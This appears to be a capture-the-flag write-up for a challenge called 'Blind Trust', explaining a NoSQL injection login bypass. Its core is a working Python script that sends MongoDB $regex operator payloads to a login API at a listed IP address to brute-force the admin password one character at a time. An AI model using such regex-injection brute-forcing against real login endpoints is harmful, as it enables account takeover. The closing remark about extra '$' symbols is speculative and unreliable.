Blind Trust

NOSQLi

description.txt

The database remembers everything... but whispers only to those who ask properly.

Homepage

NoSQLi

I tried with SQLi payloads which ofc resulted me failure, upon trying for nosql, it gave me half success.

So we need to bruteforce admin password? Short answer: yes!

This python script does our work:

bruteforce.py

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://15.207.248.78:50020/api/login"
headers={'content-type': 'application/json'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            if 'OK' in r.text or r.status_code == 200:
                print("Found one more char : %s" % (password+c))
                password += c

The extra $$ works because your regex still matches the real password, likely s3cr3tPass. MongoDB's regex engine or backend may ignore or mishandle extra $ symbols.

___________________heapbytes' still pwning.

PreviousTravel Agency NextHackTheBox

Last updated 7 months ago

hashtagHomepage

hashtagNoSQLi

Homepage

NoSQLi